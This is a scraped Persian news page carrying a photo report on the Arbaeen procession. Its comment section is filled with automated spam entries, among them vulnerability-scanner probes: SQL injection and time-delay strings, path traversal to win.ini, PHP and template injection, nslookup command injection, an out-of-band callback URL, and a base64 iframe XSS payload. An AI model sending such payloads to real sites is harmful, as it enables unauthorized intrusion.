دات نت نیوک
X
سامانه های سازمانی
Saturday 23 January 2021  |   | Login

گزارش تصویری / حضور نماینده ولی فقیه و رئیس سازمان حج وزیارت در راهپیمایی اربعین حسینی

گزارش تصویری / حضور نماینده ولی فقیه و رئیس سازمان حج وزیارت در راهپیمایی اربعین حسینی

گزارش تصویری

برچسب ها : اربعین
مدیر سایت امتیاز به خبر :

عکسهای مرتبط

ارسال نظرات

Name (required)

Email (required)

Website

نظرات شما

tekyhwss
tekyhwss Monday, March 30, 2020 16:43
1
yaisokgs
yaisokgs Monday, March 30, 2020 17:06
1
xfrstdss
xfrstdss Monday, March 30, 2020 17:07
1
tekyhwss
tekyhwss Monday, March 30, 2020 17:21
1
tekyhwss
tekyhwss Monday, March 30, 2020 17:22
1
yaisokgs
yaisokgs Monday, March 30, 2020 18:19
1
xfrstdss
xfrstdss Monday, March 30, 2020 18:21
1
tekyhwss
tekyhwss Monday, March 30, 2020 18:50
1
tekyhwss
tekyhwss Monday, March 30, 2020 18:51
1
tekyhwss
tekyhwss Monday, March 30, 2020 18:52
1
tekyhwss
tekyhwss Monday, March 30, 2020 18:54
1
yaisokgs
yaisokgs Monday, March 30, 2020 20:50
1
yaisokgs
yaisokgs Monday, March 30, 2020 20:51
1
yaisokgs
yaisokgs Monday, March 30, 2020 20:54
1
xfrstdss
xfrstdss Monday, March 30, 2020 20:56
1
xfrstdss
xfrstdss Monday, March 30, 2020 20:57
1
tekyhwss
tekyhwss Monday, March 30, 2020 21:54
1
seesxyut
seesxyut Monday, March 30, 2020 21:55
1
tekyhwss
tekyhwss Monday, March 30, 2020 21:56
1
tekyhwss
tekyhwss Monday, March 30, 2020 21:57
1
yaisokgs
yaisokgs Tuesday, March 31, 2020 01:52
1
yaisokgs
yaisokgs Tuesday, March 31, 2020 01:54
1
yaisokgs
yaisokgs Tuesday, March 31, 2020 01:55
1
yaisokgs
yaisokgs Tuesday, March 31, 2020 01:56
1
yaisokgs
yaisokgs Tuesday, March 31, 2020 01:57
1
xfrstdss
xfrstdss Tuesday, March 31, 2020 02:02
1
xfrstdss
xfrstdss Tuesday, March 31, 2020 02:03
1
xfrstdss
xfrstdss Tuesday, March 31, 2020 02:05
1
xrrvnkop
xrrvnkop Friday, April 03, 2020 03:50
1
wssgbmac
wssgbmac Friday, April 03, 2020 04:00
1
cvxqgguo
cvxqgguo Friday, April 03, 2020 04:03
1
gnuocfio
gnuocfio Friday, April 03, 2020 04:07
1
gnuocfio
gnuocfio Friday, April 03, 2020 04:08
1
gnuocfio
gnuocfio Friday, April 03, 2020 04:09
1
rybfulyf
rybfulyf Friday, April 03, 2020 04:13
1
bwhkgsac
bwhkgsac Friday, April 03, 2020 04:18
1
psofxvei
psofxvei Friday, April 03, 2020 04:24
1
psofxvei
psofxvei Friday, April 03, 2020 04:25
1
srojiext
srojiext Friday, April 03, 2020 04:35
1
gtscbrmg
gtscbrmg Friday, April 03, 2020 04:37
1
gtscbrmg
gtscbrmg Friday, April 03, 2020 04:38
1
mismttgg
mismttgg Friday, April 03, 2020 04:49
1
kecqrily
kecqrily Friday, April 03, 2020 04:56
1
sewylgmv
sewylgmv Friday, April 03, 2020 04:57
1
sewylgmv
sewylgmv Friday, April 03, 2020 04:59
1
eomdawgj
eomdawgj Friday, April 03, 2020 05:01
1
cyixksra
cyixksra Friday, April 03, 2020 05:06
1
jhtuewvu
jhtuewvu Friday, April 03, 2020 05:12
1
cubsxrcb
cubsxrcb Friday, April 03, 2020 05:21
1
motsclrw
motsclrw Saturday, April 04, 2020 01:24
1
cbqtxqag
cbqtxqag Saturday, April 04, 2020 01:25
1
cbqtxqag
cbqtxqag Saturday, April 04, 2020 01:26
1
cbqtxqag
cbqtxqag Saturday, April 04, 2020 01:27
1
osucdnrj
osucdnrj Saturday, April 04, 2020 01:29
1
golqfrmt
golqfrmt Saturday, April 04, 2020 01:33
1
golqfrmt
golqfrmt Saturday, April 04, 2020 01:34
1
golqfrmt
golqfrmt Saturday, April 04, 2020 01:35
1
golqfrmt
golqfrmt Saturday, April 04, 2020 01:37
1
golqfrmt
golqfrmt Saturday, April 04, 2020 01:38
1
mitcaeyt
mitcaeyt Saturday, April 04, 2020 01:39
1
golqfrmt
golqfrmt Saturday, April 04, 2020 01:46
1
ygarxiji
ygarxiji Saturday, April 04, 2020 01:51
1
mpihmswp
mpihmswp Saturday, April 04, 2020 02:01
1
kxifebeg
kxifebeg Saturday, April 04, 2020 02:07
1
qqsyaohy
qqsyaohy Saturday, April 04, 2020 02:11
1
qqsyaohy
qqsyaohy Saturday, April 04, 2020 02:14
1
kfyqhrrl
kfyqhrrl Saturday, April 04, 2020 02:16
1
kfyqhrrl
kfyqhrrl Saturday, April 04, 2020 02:17
1
wvkfhrlr
wvkfhrlr Saturday, April 04, 2020 02:18
1
jioncsya
jioncsya Saturday, April 04, 2020 02:33
1
jlnvrqic
jlnvrqic Saturday, April 04, 2020 02:37
1
jlnvrqic
jlnvrqic Saturday, April 04, 2020 02:38
1
jlnvrqic
jlnvrqic Saturday, April 04, 2020 02:39
1
csjxsiyo
csjxsiyo Saturday, April 04, 2020 02:42
1
csjxsiyo
csjxsiyo Saturday, April 04, 2020 02:43
1
ufbokqhy
ufbokqhy Saturday, April 04, 2020 02:48
1
ufbokqhy
ufbokqhy Saturday, April 04, 2020 02:50
1
rdylbgjy
rdylbgjy Saturday, April 04, 2020 02:51
1
nkolhhid
nkolhhid Saturday, April 04, 2020 15:05
1
nkolhhid
nkolhhid Saturday, April 04, 2020 15:08
1
nkolhhid
nkolhhid Saturday, April 04, 2020 15:12
1
nkolhhid
nkolhhid Saturday, April 04, 2020 15:14
1
nkolhhid
nkolhhid Saturday, April 04, 2020 15:15
1
yaisokgs
yaisokgs Sunday, April 05, 2020 18:08
1
yaisokgs
yaisokgs Sunday, April 05, 2020 18:09
1
yaisokgs
yaisokgs Sunday, April 05, 2020 18:13
1
xfrstdss
xfrstdss Sunday, April 05, 2020 18:33
1
xfrstdss
xfrstdss Sunday, April 05, 2020 18:33
"+response.write(9305390*9639097)+"
xfrstdss
xfrstdss Sunday, April 05, 2020 18:33
../../../../../../../../../../windows/win.ini
xfrstdss
xfrstdss Sunday, April 05, 2020 18:33
1'"
xfrstdss
xfrstdss Sunday, April 05, 2020 18:34
1
xfrstdss
xfrstdss Sunday, April 05, 2020 18:35
1
xfrstdss
xfrstdss Sunday, April 05, 2020 18:36
1
tekyhwss
tekyhwss Sunday, April 05, 2020 18:46
1
tekyhwss
tekyhwss Sunday, April 05, 2020 18:46
-1; waitfor delay '0:0:21' --
tekyhwss
tekyhwss Sunday, April 05, 2020 18:46
Http://testasp.vulnweb.com/t/fit.txt
tekyhwss
tekyhwss Sunday, April 05, 2020 18:47
1
tekyhwss
tekyhwss Sunday, April 05, 2020 18:58
1
tekyhwss
tekyhwss Sunday, April 05, 2020 18:58
-1' OR 2+748-748-1=0+0+0+1 or '5ndCkxGU'='
tekyhwss
tekyhwss Sunday, April 05, 2020 18:58
${10000087+9999592}
tekyhwss
tekyhwss Sunday, April 05, 2020 18:59
;print(md5(acunetix_wvs_security_test));
tekyhwss
tekyhwss Sunday, April 05, 2020 18:59
1����
tekyhwss
tekyhwss Sunday, April 05, 2020 18:59
1'"
tekyhwss
tekyhwss Sunday, April 05, 2020 18:59
1
tekyhwss
tekyhwss Sunday, April 05, 2020 19:00
1
tekyhwss
tekyhwss Sunday, April 05, 2020 19:11
1
tekyhwss
tekyhwss Sunday, April 05, 2020 19:11
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
tekyhwss
tekyhwss Sunday, April 05, 2020 19:12
tekyhwss
tekyhwss Sunday, April 05, 2020 19:12
1'"()&%
tekyhwss
tekyhwss Sunday, April 05, 2020 19:24
1
tekyhwss
tekyhwss Sunday, April 05, 2020 19:25
${@print(md5(acunetix_wvs_security_test))}\
tekyhwss
tekyhwss Sunday, April 05, 2020 19:25
1
tekyhwss
tekyhwss Sunday, April 05, 2020 19:37
1
xfrstdss
xfrstdss Sunday, April 05, 2020 20:42
1
xfrstdss
xfrstdss Sunday, April 05, 2020 20:43
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfrstdss
xfrstdss Sunday, April 05, 2020 20:43
1
xfrstdss
xfrstdss Sunday, April 05, 2020 20:58
1
xfrstdss
xfrstdss Sunday, April 05, 2020 20:59
1
tekyhwss
tekyhwss Sunday, April 05, 2020 21:11
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:09
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:09
-1 OR 2+917-917-1=0+0+0+1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:09
WEB-INF/web.xml
tekyhwss
tekyhwss Sunday, April 05, 2020 22:10
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:19
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:32
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:33
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:43
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:43
109TM48O'));select pg_sleep(21); --
tekyhwss
tekyhwss Sunday, April 05, 2020 22:44
1'"
tekyhwss
tekyhwss Sunday, April 05, 2020 22:44
@@L6HLv
tekyhwss
tekyhwss Sunday, April 05, 2020 22:44
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:52
1
tekyhwss
tekyhwss Sunday, April 05, 2020 22:53
1
tekyhwss
tekyhwss Sunday, April 05, 2020 23:02
1
tekyhwss
tekyhwss Sunday, April 05, 2020 23:02
testasp.vulnweb.com
tekyhwss
tekyhwss Sunday, April 05, 2020 23:03
\
tekyhwss
tekyhwss Sunday, April 05, 2020 23:03
1
&nslookup d1LW6X3S&'\
&nslookup d1LW6X3S&'\"`0&nslookup d1LW6X3S&`' Sunday, April 05, 2020 23:27
1
tekyhwss
tekyhwss Sunday, April 05, 2020 23:27
${9999643+9999792}
tekyhwss
tekyhwss Sunday, April 05, 2020 23:27
1����
tekyhwss
tekyhwss Sunday, April 05, 2020 23:37
1
tekyhwss
tekyhwss Sunday, April 05, 2020 23:47
1
tekyhwss
tekyhwss Sunday, April 05, 2020 23:47
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
tekyhwss
tekyhwss Sunday, April 05, 2020 23:47
;print(md5(acunetix_wvs_security_test));
tekyhwss
tekyhwss Sunday, April 05, 2020 23:48
1
tekyhwss
tekyhwss Sunday, April 05, 2020 23:57
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:09
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:09
-1 OR 2+984-984-1=0+0+0+1
yaisokgs
yaisokgs Monday, April 06, 2020 00:09
@@AxIFr
yaisokgs
yaisokgs Monday, April 06, 2020 00:10
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:18
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:18
-1);select pg_sleep(7); --
yaisokgs
yaisokgs Monday, April 06, 2020 00:18
�''�""
yaisokgs
yaisokgs Monday, April 06, 2020 00:19
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:24
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:27
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:27
http://hit0MOUYSLArT.bxss.me/
yaisokgs
yaisokgs Monday, April 06, 2020 00:28
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:43
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:44
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:52
1
yaisokgs
yaisokgs Monday, April 06, 2020 00:52
X8yQNKQu');select pg_sleep(6); --
yaisokgs
yaisokgs Monday, April 06, 2020 00:52
1'"
yaisokgs
yaisokgs Monday, April 06, 2020 00:53
1
yaisokgs
yaisokgs Monday, April 06, 2020 01:01
1
yaisokgs
yaisokgs Monday, April 06, 2020 01:02
";print(md5(acunetix_wvs_security_test));$a="
yaisokgs_9886
yaisokgs_9886 Monday, April 06, 2020 01:02
1
yaisokgs<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9605'>
yaisokgs